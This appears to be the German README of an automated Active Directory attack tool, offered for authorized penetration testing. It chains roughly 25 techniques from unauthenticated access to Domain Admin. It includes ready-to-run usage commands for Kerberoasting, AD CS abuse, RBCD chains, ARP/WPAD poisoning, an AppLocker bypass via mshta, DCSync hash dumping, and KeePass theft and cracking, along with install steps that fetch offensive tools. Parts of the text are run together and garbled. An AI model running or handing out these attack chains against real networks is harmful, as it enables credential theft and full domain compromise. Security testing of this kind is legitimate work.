
AD AutoPwn v4.10.0 — automatisierte AD-Angriffskette, von Null-Authentifizierung bis Domain-Administrator. Discover/Kerberoast/AS-REP/AD CS ESC1-16/Shadow Creds/RBCD+KCD/Ghost-SPN/TGS-rewrite/Dollar-Ticket/WPAD/WSUS/PXE/SCCM/BloodHound auto-action/Loot/DCSync/DPAPI + Synacktiv 2026 reflection (CVE-2025-58726/2026-24294/2026-26128). Nur für autorisierte Penetrationstests.
Null-Authentifizierung zu Domain-Administrator — Automatisierte Active-Directory-Angriffskette
Ein vollautomatisiertes Penetrationstest-Tool, das 25+ Angriffstechniken zu einer Kette verknüpft, um Active-Directory-Umgebungen zu kompromittieren. Entwickelt für autorisierte Sicherheitsüberprüfungen.
_ ___ _ _ ___
/_\ | \ /_\ _ _| |_ ___| _ \__ __ ___ _
/ _ \| |) | / _ \ || | _/ _ \ _/\ V V / ' \
/_/ \_\___/ /_/ \_\_,_|\__\___/_| \_/\_/|_||_|
⚡ Null-Auth zu Domain-Admin — Angriffskette
Entdecken | Sniffen | ARP | WPAD | WSUS | PXE | AD CS | SCCM | Roasten
BloodHound | Reflektieren | Ausbeuten | RBCD+KCD | DCSync | DPAPI
DONT_REQ_PREAUTH)--spray-password).library-ms / .theme / .url-Dateien auf beschreibbaren Freigabenbloodhound-python -c All-Sammlung + ZIP-AnalyseWriteSPN, AddKeyCredentialLink, GenericAll/Write, WriteDacl/Owner, WriteAccountRestrictions, AddAllowedToAct, ForceChangePasswordWriteSPN → ghost-SPN-Upgrade (CVE-2025-58726)AddKeyCredentialLink → Schatten-Anmeldeinformationen → PKINIT → NT-HashGenericAll / WriteAccountRestrictions on Computer → RBCD-Kette → Admin-TGS-altservice-Umschreibung, in einer Phase-altservice$-Suffix-Wiederholungsversuch bei Principal-Suche → TGT für Linux-Benutzer via automatisch erstelltes <user>$-Maschinenkonto → GSSAPI SSHGet-CimInstance Win32_Process via nxc -x; Regex-Grep nach Passwörtern in mysql/sqlcmd/runas/KeePass/--password-artigen Flags*.kdbx in C:\Users finden, via smbclient herunterladen, keepass2john | hashcat -m 13400# Vollautomatisiert — Null-Anmeldeinformationskette (automatische Erkennung)
sudo ./ad-autopwn.py
# Mit Anmeldeinformationen — vollständige Kette
./ad-autopwn.py -u jsmith -p 'P@ss123' -d corp.local --dc-ip 10.0.0.1
# AWS / VPC-Labs (Layer-2-Angriffe blockiert) — Auto-Erkennung funktioniert trotzdem
sudo ./ad-autopwn.py --no-arp --no-wpad
# Prä-Auth-Anmeldeinformationserkennung (Lockout-sicher)
sudo ./ad-autopwn.py --phase discover --no-arp --no-wpad
# BloodHound-Graph-Sammlung + automatische Hochwert-Analyse
./ad-autopwn.py --phase bloodhound -u user -p pass -d corp.local \
--dc-ip 10.0.0.1 --dc-fqdn dc01.corp.local
# Dollar Ticket — TGT für 'root' via automatisch erstelltes root$-Maschinenkonto
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase dollar-ticket --target-user root
# RBCD+KCD-Kette — vollständig ghost-SPN + RBCD + altservice-Umschreibung, auf einen Schlag
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase rbcd-kcd -T VHAGAR$ --alt-spn HTTP/vhagar.corp.local
# AppLocker-Bypass
./ad-autopwn.py -u user -p pass --applocker --lolbin mshta --custom-cmd "whoami"
# Probelauf (jeden Befehl anzeigen, nichts ausführen — auch Hintergrundprozesse)
./ad-autopwn.py --dry-run -u user -p pass -d corp.local --dc-ip 10.0.0.1
apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
/opt/tools/)git clone https://github.com/mverschu/CVE-2025-33073 /opt/tools/CVE-2025-33073
git clone https://github.com/dirkjanm/krbrelayx /opt/tools/krbrelayx
git clone https://github.com/Wh04m1001/DFSCoerce /opt/tools/DFSCoerce
git clone https://github.com/ShutdownRepo/ShadowCoerce /opt/tools/ShadowCoerce
git clone https://github.com/ShutdownRepo/pywhisker /opt/tools/pywhisker
git clone https://github.com/dirkjanm/PKINITtools /opt/tools/PKINITtools
git clone https://github.com/csandker/pxethiefy /opt/tools/pxethiefy
git clone https://github.com/garrettfoster13/sccmhunter /opt/tools/sccmhunter
git clone https://github.com/dirkjanm/mitm6 /opt/tools/mitm6
git clone https://github.com/Hackndo/pyGPOAbuse /opt/tools/pyGPOAbuse
git clone https://github.com/Hackndo/WebclientServiceScanner /opt/tools/WebclientServiceScanner
git clone https://github.com/almandin/Certihound /opt/tools/Certihound
pipx install coercer
pipx install wsuks --system-site-packages
kerbrute — die neueste Binärdatei von
https://github.com/ropnop/kerbrute/releases herunterladen — nach /usr/local/bin/ installierenuserenum-cldap — begleitender CLDAP NetLogon-Ping-Enumerator (befindet sich in
diesem Repository als userenum-cldap.py; nach /usr/local/bin/userenum-cldap installieren)asn1tools — pip install asn1tools (CLDAP-Enum-Laufzeitabhängigkeit)# APT-Pakete
sudo apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
# Alle benötigten Repos
for repo in mverschu/CVE-2025-33073 dirkjanm/krbrelayx \
Wh04m1001/DFSCoerce ShutdownRepo/ShadowCoerce \
ShutdownRepo/pywhisker dirkjanm/PKINITtools \
csandker/pxethiefy garrettfoster13/sccmhunter \
dirkjanm/mitm6 Hackndo/pyGPOAbuse \
Hackndo/WebclientServiceScanner almandin/Certihound; do
sudo git clone "https://github.com/$repo" "/opt/tools/$(basename $repo)"
done
# Python-Abhängigkeiten für Repos, die sie benötigen
for repo in pywhisker PKINITtools sccmhunter pxethiefy mitm6 pyGPOAbuse Certihound; do
[ -f "/opt/tools/$repo/requirements.txt" ] && \
pip3 install --break-system-packages -r "/opt/tools/$repo/requirements.txt"
done
# Pipx-Pakete
pipx install coercer
pipx install wsuks --system-site-packages
# kerbrute (ropnop) Binärdatei
sudo wget -q -O /usr/local/bin/kerbrute \
https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
sudo chmod +x /usr/local/bin/kerbrute
# CLDAP-Userenum-Laufzeitabhängigkeit
sudo pip3 install --break-system-packages asn1tools
# userenum-cldap-Begleitskript (dieses Repository)
sudo wget -q -O /usr/local/bin/userenum-cldap \
https://raw.githubusercontent.com/jonaslejon/ad-autopwn/main/userenum-cldap.py
sudo chmod +x /usr/local/bin/userenum-cldap
# ad-autopwn selbst
sudo cp ad-autopwn.py /usr/local/bin/ad-autopwn
sudo chmod +x /usr/local/bin/ad-autopwn
check_prerequisites() wird zu Beginn jedes Aufrufs ausgeführt und zeigt
für jedes Tool, das das Skript berührt, einen grünen ✅ / gelben ⚠️ Status an,
mit Installationshinweisen für fehlende Komponenten.
eu-west-1 — vollständige v4.10.0-Phasenabdeckung Ende-zu-Ende
verifiziert. Auto-Erkennung auf AWS funktioniert jetzt mit buchstäblich nur
--no-arp --no-wpad (alles andere — Schnittstelle, Angreifer-IP,
Domäne, DC-IP, DC-FQDN — wird automatisch via Subnetz-Sweep + Dig
Fallback auf @<dc_ip> erkannt).stannis.baratheon → GenericAll → KINGSLANDING$-Kante: von einer einzigen
Low-Privilegien-Anmeldung zu Admin-TGS auf dem DC in 5 Sekunden.krbtgt — Golden Ticket möglich.--dry-run gibt jeden Befehl (Vordergrund und Hintergrund) aus, ohne
ihn auszuführen — es werden keine ARP-Spoofer, mitm6, Responder oder ntlmrelayx gestartet.try/finally mit os.chdir eingewickelt,
um sicherzustellen, dass die Wiederherstellung bei jedem Exit-Pfad im richtigen Verzeichnis landet.--no-cleanup behält alles für forensische Überprüfung.Nur für autorisierte Penetrationstests und Sicherheitsforschung.
Dieses Tool ist für die Verwendung durch Sicherheitsexperten während autorisierter Engagements konzipiert. Nicht autorisierter Zugriff auf Computersysteme ist illegal. Holen Sie vor dem Testen immer eine schriftliche Genehmigung ein.
Triop AB — https://triop.se
MIT
| Phase | Auth | Beschreibung |
|---|
full | optional | Vollständige automatisierte Kette (automatische Erkennung mit oder ohne Anmeldeinformationen) |
sniff | keine | Passiver L2-Datenverkehr-Erkennung |
discover | keine | kerbrute + CLDAP + AS-REP + pre2k + (opt-in) Spray |
arp | keine | ARP-Spoof + NTLM-Erfassung |
wpad | keine | WPAD/LLMNR-Vergiftung (mitm6 / Responder) |
wsus | keine | WSUS-NTLM-Relay |
pxe | keine | PXE-Boot-Anmeldeinformationsdiebstahl |
enum | ja | Zielenumeration (Relay-Ziele, uneingeschränkte Delegierung, WebClient-Hosts) |
enrich | ja | nxc-13-Modul-Batterie (LAPS, timeroast, MAQ, nopac, zerologon, …) + Auto-Consumer |
bloodhound | ja | bloodhound-python -c All + Analyse + Auto-Aktionsketten |
roast | ja | Kerberoast + AS-REP Roast |
adcs | ja | AD CS-Ausnutzung (ESC1-ESC16) |
sccm | ja | SCCM NAA-Anmeldeinformationsdiebstahl |
exploit | ja | NTLM-Reflection / Nötigungs-Exploit auf einem bestimmten Ziel |
dcsync | ja (DA) | Domänen-Hash-Dump |
loot | ja | Prozess-Befehlszeilen-Ernte + KeePass-Erkennung/Knacken |
tgs-rewrite | keine | Offline-ccache-sname-Umschreibung (tgssub-artiger KCD-Bypass) |
dollar-ticket | ja | KDC $-Suffix-Wiederholungsangriff (Linux GSSAPI-Ziel) |
rbcd-kcd | ja | Vollständiger RBCD+KCD-Kettenorchestrator (WriteSPN → ghost → RBCD → S4U+altservice) |
reflect-tcpport | ja | CVE-2026-24294 LPE-Primitiv (SMB-auf-TCP-Port) |
reflect-loopback | ja | CVE-2026-26128 LPE-Primitiv (Kerberos-Loopback via Unicode SPN) |
kerb-reflect | ja | CVE-2025-58726 ghost-SPN AP-REQ-Reflection |